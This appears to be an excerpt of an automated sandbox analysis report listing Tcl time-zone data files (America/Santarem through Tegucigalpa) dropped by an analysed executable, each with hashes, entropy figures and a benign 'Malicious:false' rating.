                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                                              Entropy (8bit):3.8200568741699223
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5zeUdunSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/h:52SeSFESoSQSrSsCSeSPS1cSQSQlSsSU
                                                                                                                                                                                                                              MD5:7F2658032008F2C1308F121C2EBF2479
                                                                                                                                                                                                                              SHA1:B6F24E818B4424C0DEF818C103D1DA5359958932
                                                                                                                                                                                                                              SHA-256:4A397BD937DE1D7E6A941D18001B34D4CD195AEFD08951C30C7EE8E48656AA0E
                                                                                                                                                                                                                              SHA-512:F78853AA75F58A85555DD79E08A7487E5161854650DBF480189790D855738FEDCBDA936870067DE40FE000861008A9E9AAF61DF02B6B30B96038C61B5E1F1C1D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santarem) {.. {-9223372036854775808 -13128 0 LMT}.. {-1767212472 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8871
                                                                                                                                                                                                                              Entropy (8bit):3.5351636359890537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2Xv/lxUQjzoMUBI0nuUoDK6lPlgiot7JC/k8NWse4r4g5xCEmMQUs8nCxvisEbzu:2fD9TzDC9g32+E
                                                                                                                                                                                                                              MD5:81FC6AFF68B1CF2EA57ED13A42B35BE1
                                                                                                                                                                                                                              SHA1:5889E502FBDCBCDFE9E7053625FFFBAD61FFE256
                                                                                                                                                                                                                              SHA-256:77CED11337F43241D57C10BA752C7104A7AF8727992E7B90A3C5D62AA15E81C7
                                                                                                                                                                                                                              SHA-512:7756CBAF76966F3D45883B725B791A8DD60E8329F6FE19C12029C6FEBC90D7322765A0A8BA26FC586443A902B372D0C0189426A8F99B2B535BB8F1EE74796B44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santiago) {.. {-9223372036854775808 -16965 0 LMT}.. {-2524504635 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-740520000 -10800 1 -03}.. {-736635600 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.330655351784895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290/StmdHhvCvuCY/h/uFkS/5MVvMrW//MVvMrpx/m0XVvMr4UB/47VvMr/d:5+seQvuCY5/u/REfk+xxdbUBQpu652GO
                                                                                                                                                                                                                              MD5:FAD0621010889164ADC4472003C9391F
                                                                                                                                                                                                                              SHA1:C4EE0B8D6925338D17D5745DE9D45FA3C628DFC5
                                                                                                                                                                                                                              SHA-256:2217E72B11A90F2D679C175DE3CC0F2FED4C280C9FF9707CFFAF118BF9A06A4B
                                                                                                                                                                                                                              SHA-512:90E8E5A109CD72458C7796CF0324F63E543CCD63D13A09A3DD28EDC8B2793C964C18E79FDF0C5067C5A481B7FB03E8413139C32F59DA07E9D7893378ABBBD2B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santo_Domingo) {.. {-9223372036854775808 -16776 0 LMT}.. {-2524504824 -16800 0 SDMT}.. {-1159773600 -18000 0 EST}.. {-100119600 -14400 1 EDT}.. {-89668800 -18000 0 EST}.. {-5770800 -16200 1 -0430}.. {4422600 -18000 0 EST}.. {25678800 -16200 1 -0430}.. {33193800 -18000 0 EST}.. {57733200 -16200 1 -0430}.. {64816200 -18000 0 EST}.. {89182800 -16200 1 -0430}.. {96438600 -18000 0 EST}.. {120632400 -16200 1 -0430}.. {127974600 -18000 0 EST}.. {152082000 -14400 0 AST}.. {975823200 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2900
                                                                                                                                                                                                                              Entropy (8bit):3.6548008349990755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uFChlvEwR9xSSx5H4a8tf3fku+da2XUd23t8VZDG8+w/ghBPWTRz908a9zRgwun:cFIlvEwZSSxdF8tfMu+da2kdCt8VZy8n
                                                                                                                                                                                                                              MD5:F6B732A862659EB131C2E6FEC00E9734
                                                                                                                                                                                                                              SHA1:49517DF63BC5B6FEC875CE9477BBF84F4072FA31
                                                                                                                                                                                                                              SHA-256:0E7BA1C5A3FA3DABDAA226BFE1E8D797A3835EA554828881AB5E365EDA09B92E
                                                                                                                                                                                                                              SHA-512:670A5B604B5EA0F5FA15083BC1EA115B7EFD449F9EAC4518E109493591893DD3627AFC6628E0EDD1953E932E2A7AD9B5A379526548677158EC445366E4ED7166
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sao_Paulo) {.. {-9223372036854775808 -11188 0 LMT}.. {-1767214412 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-195429600 -7200 1 -02}.. {-189381600 -7200 0 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6839
                                                                                                                                                                                                                              Entropy (8bit):3.565857684485945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9OgtbdF7TI7nYUYXg9W/OAcv7vuShytWi0PnvLrqPoKR2XszXckXtogYN4Ezlk0X:PJr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:D1BF579FE8123E8EE9248A51E794CC78
                                                                                                                                                                                                                              SHA1:BF9CB9BED143C7529719E0C1E2F88BE1AC9F8DD4
                                                                                                                                                                                                                              SHA-256:158BD9E4EB0B9DFF3F2D3E2DBA72F217B73423012DD33A688FD57852124E884A
                                                                                                                                                                                                                              SHA-512:78192AC38912021F848592D0B208CB122EFFC6DDB326540FFAADA4FD3322B7A442FD1116F408D64B8788520B46545DFAE571EA42046D62A282A97ECCD5663655
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Scoresbysund) {.. {-9223372036854775808 -5272 0 LMT}.. {-1686090728 -7200 0 -02}.. {323841600 -3600 0 -01}.. {338961600 -7200 0 -02}.. {354679200 0 0 +00}.. {370400400 -3600 0 -01}.. {386125200 0 1 +00}.. {401850000 -3600 0 -01}.. {417574800 0 1 +00}.. {433299600 -3600 0 -01}.. {449024400 0 1 +00}.. {465354000 -3600 0 -01}.. {481078800 0 1 +00}.. {496803600 -3600 0 -01}.. {512528400 0 1 +00}.. {528253200 -3600 0 -01}.. {543978000 0 1 +00}.. {559702800 -3600 0 -01}.. {575427600 0 1 +00}.. {591152400 -3600 0 -01}.. {606877200 0 1 +00}.. {622602000 -3600 0 -01}.. {638326800 0 1 +00}.. {654656400 -3600 0 -01}.. {670381200 0 1 +00}.. {686106000 -3600 0 -01}.. {701830800 0 1 +00}.. {717555600 -3600 0 -01}.. {733280400 0 1 +00}.. {749005200 -3600 0 -01}.. {764730000 0 1 +00}.. {780454800 -3600 0 -01}.. {796179600 0 1 +00}.. {8
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.888573146674231
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/2IAcGEtOFBx+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/290tO09Z
                                                                                                                                                                                                                              MD5:2FF74846ADF32AA3A9418376775B7F25
                                                                                                                                                                                                                              SHA1:130D7548DFFEBCE74969962E335B40299D7C5C54
                                                                                                                                                                                                                              SHA-256:BF4FAB3AE72CC7FA4F9E34CF0551A85C54A084CD826DF5D9CC684DE6188E84DB
                                                                                                                                                                                                                              SHA-512:9E52C017E595EEF1C68C8A1943416A9109D7DB4C32D25F83D05213C4200869A50E2E726894E39ECA364C558BB7F5566F6150CEA5D3CB14D1DEAE28C3D8C810E0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:America/Shiprock) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8651
                                                                                                                                                                                                                              Entropy (8bit):3.959337076866423
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:IGCG0hPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:I5G0A9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:7CCB6902749079A0496F1E2E2137448E
                                                                                                                                                                                                                              SHA1:3D0ED7BF1C26659F6794E26AE3869F8AB925B6DF
                                                                                                                                                                                                                              SHA-256:ABB08435CAE80119068A85984BFFE9C1596F4FB90F07CC01124C907E5162C189
                                                                                                                                                                                                                              SHA-512:0B5B2DCECC70F357DB6D590AB63E600C572EA6B3F430565EFEB29777B1901AAC55CACC7495C668F739201076B180402141BC1B2ED2357E9B4DFBABF3B122AB44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sitka) {.. {-9223372036854775808 53927 0 LMT}.. {-3225223727 -32473 0 LMT}.. {-2188954727 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {3099492
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.932842207797733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290txP90ppv:MByMYbpwt2907P90b
                                                                                                                                                                                                                              MD5:CBFA61DBF6F7459CF8D517402B29998E
                                                                                                                                                                                                                              SHA1:A562B29C9470DBD25480966B0462433124BA4164
                                                                                                                                                                                                                              SHA-256:353CDBD46BA8C7472A93E9E800A69105801F6784B22EC50A59294CDC3BE40E18
                                                                                                                                                                                                                              SHA-512:00B333EAA2C32EDDA8F06457AD0E10013A0147B20F504F4F1096656F731A7C1896D5ABD83E7EDBD5D4E7DA587EE9BFA796539EB1E9F4056D75D1FDF203251150
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Barthelemy) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11289
                                                                                                                                                                                                                              Entropy (8bit):3.8713946894934614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PmxVjd1cO8f7/EjUhSicN6zvfwb+8YbTE0M0J:PmrcOI7/EjiskY01J
                                                                                                                                                                                                                              MD5:8F068899DA75663128320633E1881333
                                                                                                                                                                                                                              SHA1:E9161B45D7B11A2DD6E9679AC080E84EC51561E3
                                                                                                                                                                                                                              SHA-256:E2917204B0C843C32051BB371CF6D0AD272C02720B9C0D913AC072C8ABE1EC64
                                                                                                                                                                                                                              SHA-512:2200E9B9D816157330ADAEA7383635876E5A37329B1AF9613D38BCFBE8143835837A25132A94E44A61DB8058ED98B1A33F295EA64BC1F4CE30966D52BB0B673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/St_Johns) {.. {-9223372036854775808 -12652 0 LMT}.. {-2713897748 -12652 0 NST}.. {-1664130548 -9052 1 NDT}.. {-1650137348 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1598650148 -9052 1 NDT}.. {-1590100148 -12652 0 NST}.. {-1567286948 -9052 1 NDT}.. {-1551565748 -12652 0 NST}.. {-1535837348 -9052 1 NDT}.. {-1520116148 -12652 0 NST}.. {-1503782948 -9052 1 NDT}.. {-1488666548 -12652 0 NST}.. {-1472333348 -9052 1 NDT}.. {-1457216948 -12652 0 NST}.. {-1440883748 -9052 1 NDT}.. {-1425767348 -12652 0 NST}.. {-1409434148 -9052 1 NDT}.. {-1394317748 -12652 0 NST}.. {-1377984548 -9052 1 NDT}.. {-1362263348 -12652 0 NST}.. {-1346534948 -9052 1 NDT}.. {-1330813748 -12652 0 NST}.. {-1314480548 -9052 1 NDT}.. {-1299364148 -12652 0 NST}.. {-1283030948 -9052 1 ND
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.907031043022691
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tMp490ppv:MByMYbpwt290g490b
                                                                                                                                                                                                                              MD5:D521F2D9B28C5374FC3BD540C6B6F40D
                                                                                                                                                                                                                              SHA1:39A3D86CB71F742F33B02F50B316638815B3CD4E
                                                                                                                                                                                                                              SHA-256:EDB9457A7C64E47062BDC6458FD3BCFCD6C37820F1A2BC89DFE99ED77355011F
                                                                                                                                                                                                                              SHA-512:05C1BE92550A962904ED3BB7DECCAC16FCB54D258F24F2AEDF755FCC44E4FEF5F86AB663945809F5D7AFA64178E807BBDAE77048270ED516DFF2C7720A746D52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Kitts) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.9037013606484905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tY90ppv:MByMYbpwt290a90b
                                                                                                                                                                                                                              MD5:9392E5A7BD198B0308F9271E4C7E59B2
                                                                                                                                                                                                                              SHA1:A902440920A0318BC930957C74804A9A51EF7818
                                                                                                                                                                                                                              SHA-256:6727A509BB937CB3446D41B57826DE70C7028E96F088AB5B7F803BEAA18279E8
                                                                                                                                                                                                                              SHA-512:6DA1EAC390E72905DF1A14D82362B499D20FAD6D85F3DF116AE01E566D5D19C6D16E56DA72C458BB6143345EF45F35A53B245488C641D80BFBA200B16A59719E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Lucia) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.919272465019375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tXIMFJ490ppv:MByMYbpwt290tJ490b
                                                                                                                                                                                                                              MD5:49D0C8DAFCA053C9967EDCC4C0A484B1
                                                                                                                                                                                                                              SHA1:7B4999D4B9AD93306BD411DF2946D741EC597770
                                                                                                                                                                                                                              SHA-256:974AEED3D79124B50265C83D84F23CBE4F0328D00C75F42DD3ABC5D4C0A78DE1
                                                                                                                                                                                                                              SHA-512:378E3657B26C5A039FF82ECCAC7797FF45CBC6479596629B3048164EE4E035F4ECFC557AA9EAF6848E78999B4FF8C63E53C7163BDF6F626ED6111004490D6F80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Thomas) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.909053768717241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tzb+Q90ppv:MByMYbpwt290xyQ90b
                                                                                                                                                                                                                              MD5:6CFB23E7164605CDE380FB7C4D88DF11
                                                                                                                                                                                                                              SHA1:CC513B29AD7B59E600DBCBC97927EB632558F657
                                                                                                                                                                                                                              SHA-256:6B19404D295964EF66F47802836BB728FCE8E6481115797C0B5F200C354D7C8A
                                                                                                                                                                                                                              SHA-512:728987D0925B6E12E8A220920BEDF94180880E78F3F08F6AC740E6304B22D446846068CEA499F61E7032ADB2E700CE31954921D478C9A8B6CB599E05A6292EA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Vincent) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):874
                                                                                                                                                                                                                              Entropy (8bit):4.253846650171654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hEbmdHLCvYX4Q19xRv0+RmwPj+uLkQOzL3+ORL4FXgenM7RSslKA1PyKp:5zeOvT4xuyqoYaAxt7l
                                                                                                                                                                                                                              MD5:C91F801CC5E9F78B966D1DF2259C38A8
                                                                                                                                                                                                                              SHA1:D29C970CBFC74684D46AAAD543B73B520775632C
                                                                                                                                                                                                                              SHA-256:939B25C9412B9E25D73F552E87826999FC8C929770E66491D1E4530046D3E758
                                                                                                                                                                                                                              SHA-512:093378E61DE9310F9C48170CBB0FDBD3C79E184DA1489F759B20BCE410006A9D5A793C82E79A46E0AFF0DAA47D9DBAFD605959E491BA9ED4E55D26F293642D32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Swift_Current) {.. {-9223372036854775808 -25880 0 LMT}.. {-2030201320 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-747241200 -21600 0 MDT}.. {-732729600 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {-684342000 -21600 1 MDT}.. {-671040000 -25200 0 MST}.. {-652892400 -21600 1 MDT}.. {-639590400 -25200 0 MST}.. {-631126800 -25200 0 MST}.. {-400086000 -21600 1 MDT}.. {-384364800 -25200 0 MST}.. {-337186800 -21600 1 MDT}.. {-321465600 -25200 0 MST}.. {-305737200 -21600 1 MDT}.. {-292435200 -25200 0 MST}.. {-273682800 -21600 1 MDT}.. {-260985600 -25200 0 MST}.. {73472400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):341
                                                                                                                                                                                                                              Entropy (8bit):4.638828647226646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2903fDm2OHskeoHxbV1ULhgdrV/uF+IcmJ3/uF+ivi9/uF+SNv:MB862903LmdHsVCn1ULSB/uF+QV/uF+q
                                                                                                                                                                                                                              MD5:4C4034ABAB9E4804CCB23E51694044C9
                                                                                                                                                                                                                              SHA1:7DB24CE83AB2C07E6F6784D27C4E3AC0F149D080
                                                                                                                                                                                                                              SHA-256:1F0503579B0DDDBAF88814A278127D9CD7019EDD3C35F4CBFC0EF11C0EDAFE5B
                                                                                                                                                                                                                              SHA-512:0BC366CD3AB2E1388D11770DC8DEC1FC94C48FDC846ABB6C487828BF9FF15CD9A1C15B33E08F6E48B7F4A6F2AD1617FF12B359784CA4C32256D72422E6825105
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tegucigalpa) {.. {-9223372036854775808 -20932 0 LMT}.. {-1538503868 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}.. {1146981600 -18000 1 CDT}.. {1154926800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6890
                                                                                                                                                                                                                              Entropy (8bit):3.8331465442823704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mJInJuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/Bm6BTd69xK7KjhVbHyR3h1gOZM:miFCC
                                                                                                                                                                                                                              MD5:D93B62D5F7EEBC28AC047BED2307CAE8
                                                                                                                                                                                                                              SHA1:8B3E02240A01B5AA42D30E86005E880916432227
                                                                                                                                                                                                                              SHA-256:7FB0CBB101D3B6FBB6B9DAD5446BBF9E6AEC65EC38472739E604F68F6AA9AB7B
                                                                                                                                                                                                                              SHA-512:3648106F4DF84CFD94AAD4E9430F8D3BBCB38A9196DE9A59246DFBBC170FADBF106DD1FD08FE2E4F7319BFFB1C2607E4F5D563C222CED8267483D1A0C388CCE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
